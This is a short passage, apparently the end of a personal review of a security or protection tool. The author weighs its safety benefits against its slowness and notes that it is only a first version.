If you are a geek like me, you have to work out if the tool makes your habits safer and live with it, or forge ahead as the speed annoyed you and run other protection.

Don’t forget, this is only version 1, future advancements will help.
